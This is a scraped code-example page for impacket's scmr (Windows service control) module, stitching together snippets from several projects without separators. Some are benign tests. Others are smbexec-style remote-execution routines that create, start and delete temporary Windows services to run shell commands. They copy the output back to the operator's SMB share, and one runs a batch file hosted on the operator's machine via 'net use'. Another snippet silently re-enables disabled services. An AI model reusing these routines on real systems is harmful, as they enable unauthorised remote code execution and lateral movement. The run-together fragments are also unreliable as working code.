How to use the impacket.dcerpc.v5.scmr function in impacket
To help you get started, we’ve selected a few impacket examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
SecureAuthCorp / impacket / tests / SMB_RPC / test_scmr.py View on Github 
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username,self.password, self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_max_fragment_size(32)
dce.connect()
if self.__class__.__name__ == 'TCPTransport':
dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(scmr.MSRPC_UUID_SCMR)
#rpc = scmr.DCERPCSvcCtl(dce)
lpMachineName = 'DUMMY\x00'
lpDatabaseName = 'ServicesActive\x00'
desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS | scmr.SC_MANAGER_ENUMERATE_SERVICE
resp = scmr.hROpenSCManagerW(dce,lpMachineName, lpDatabaseName, desiredAccess)
scHandle = resp['lpScHandle']
return dce, rpctransport, scHandledef connect(self):
if self.rrpStarted is not True:
dce, rpctransport, scHandle = self.connect_scmr()
desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS
resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00', desiredAccess)
resp.dump()
serviceHandle = resp['lpServiceHandle']
try:
resp = scmr.hRStartServiceW(dce, serviceHandle )
except Exception as e:
if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >=0:
pass
else:
raise
resp = scmr.hRCloseServiceHandle(dce, scHandle)
self.rrpStarted = Trueself.__scmr = rpc.get_dce_rpc()
try:
self.__scmr.connect()
except Exception as e:
logging.critical(str(e))
sys.exit(1)
s = rpc.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
if mode == 'SERVER':
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
self.transferClient = rpc.get_smb_connection()
self.do_cd('')def createService(self, handle, share, path):
LOG.info("Creating service %s on %s....." % (self.__service_name, self.connection.getRemoteHost()))
# First we try to open the service in case it exists. If it does, we remove it.
try:
resp = scmr.hROpenServiceW(self.rpcsvc, handle, self.__service_name+'\x00')
except Exception as e:
if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') >= 0:
# We're good, pass the exception
pass
else:
raise e
else:
# It exists, remove it
scmr.hRDeleteService(self.rpcsvc, resp['lpServiceHandle'])
scmr.hRCloseServiceHandle(self.rpcsvc, resp['lpServiceHandle'])
# Create the service
command = '%s\\%s' % (path, self.__binary_service_name)
try:
resp = scmr.hRCreateServiceW(self.rpcsvc, handle,self.__service_name + '\x00', self.__service_name + '\x00',
lpBinaryPathName=command + '\x00', dwStartType=scmr.SERVICE_DEMAND_START)def __executeRemote(self, data):
self.__tmpServiceName = ''.join([random.choice(string.letters) for _ in range(8)]).encode('utf-16le')
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' > ' + self.__batchFile + ' & ' + \
self.__shell + self.__batchFile
command += ' & ' + 'del ' + self.__batchFile
self.__serviceDeleted = False
resp = scmr.hRCreateServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName, self.__tmpServiceName,
lpBinaryPathName=command)
service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
self.__serviceDeleted = True
scmr.hRCloseServiceHandle(self.__scmr, service)command = self.__shell + data + ' ^> \\\\{}\\{}\\tmp\\{}'.format(local_ip, alea, self.__output)
else:
command = self.__shell + data
with open(os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])), 'misc', 'tmp', self.__batchFile), 'w') as batch_file:
batch_file.write(command)
logging.debug("%sHosting batch file with command: %s" % (debugBlue, command))
command = self.__shell + 'net use \\\\{}\\{} /persistent:no /user:{} {} & \\\\{}\\{}\\tmp\\{} & net use \\\\{}\\{} /del'.format(local_ip, alea, alea, alea, local_ip, alea, self.__batchFile, local_ip, alea)
logging.debug("%sCommand to execute: %s" % (debugBlue, command))
logging.debug("%sRemote service %s created." % (debugBlue, self.__serviceName))
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START)
service = resp['lpServiceHandle']
try:
logging.debug("%sRemote service %s started." % (debugBlue, self.__serviceName))
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
logging.debug("%sRemote service %s deleted." % (debugBlue, self.__serviceName))
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output_fileless()def __scmr_connect(self):
'''
Connect to svcctl named pipe
'''
self.smb_transport('svcctl')
self.__dce = self.trans.get_dce_rpc()
self.__dce.bind(scmr.MSRPC_UUID_SCMR)
self.__rpc = self.__dce
self.__resp = scmr.hROpenSCManagerW(self.__dce)
self.__mgr_handle = self.__resp['lpScHandle']self.__shouldStop = True
self.__started = False
elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
logging.debug('Service %s is already running'% self.__serviceName)
self.__shouldStop = False
self.__started = True
else:
raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])
# Let's check its configuration if service is stopped, maybe it's disabled :s
if self.__started is False:
ans = scmr.hRQueryServiceConfigW(self.__scmr,self.__serviceHandle)
if ans['lpServiceConfig']['dwStartType'] == 0x4:
logging.info('Service %s is disabled, enabling it'% self.__serviceName)
self.__disabled = True
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x3)
logging.info('Starting service %s' % self.__serviceName)
scmr.hRStartServiceW(self.__scmr,self.__serviceHandle)
sleep(1)elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
logging.debug('Service %s is already running' % self.__serviceName)
self.__shouldStop = False
self.__started = True
else:
raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])
# Let's check its configuration if service is stopped, maybe it's disabled :s
if self.__started is False:
ans = scmr.hRQueryServiceConfigW(self.__scmr, self.__serviceHandle)
if ans['lpServiceConfig']['dwStartType'] == 0x4:
logging.info('Service %s is disabled, enabling it' % self.__serviceName)
self.__disabled = True
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType=0x3)
logging.info('Starting service %s' % self.__serviceName)
scmr.hRStartServiceW(self.__scmr, self.__serviceHandle)
time.sleep(1)def execute_remote(self, data):
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + \
self.__shell + self.__batchFile
if self.__mode == 'SERVER':
command += ' & ' + self.__copyBack
command += ' & ' + 'del ' + self.__batchFile
logging.debug('Executing %s' % command)
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName,
lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START)
service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output()impacket
Network protocols Constructors and Dissectors
Package Health Score
82 / 100Popular impacket functions
- impacket.dcerpc.v5.dcomrt.DCOMANSWER
- impacket.dcerpc.v5.dcomrt.DCOMCALL
- impacket.dcerpc.v5.dtypes.NULL
- impacket.dcerpc.v5.ndr.NDRCALL
- impacket.dcerpc.v5.ndr.NDRPOINTER
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- impacket.dcerpc.v5.ndr.NDRUniConformantArray
- impacket.dcerpc.v5.scmr
- impacket.dcerpc.v5.scmr.hRCloseServiceHandle
- impacket.dcerpc.v5.transport.DCERPCTransportFactory
- impacket.LOG
- impacket.LOG.debug
- impacket.LOG.error
- impacket.LOG.info
- impacket.smb
- impacket.smb.SMB
- impacket.smb.SMBCommand
- impacket.smbconnection.SMBConnection
- impacket.structure.Structure
- impacket.uuid.uuidtup_to_bin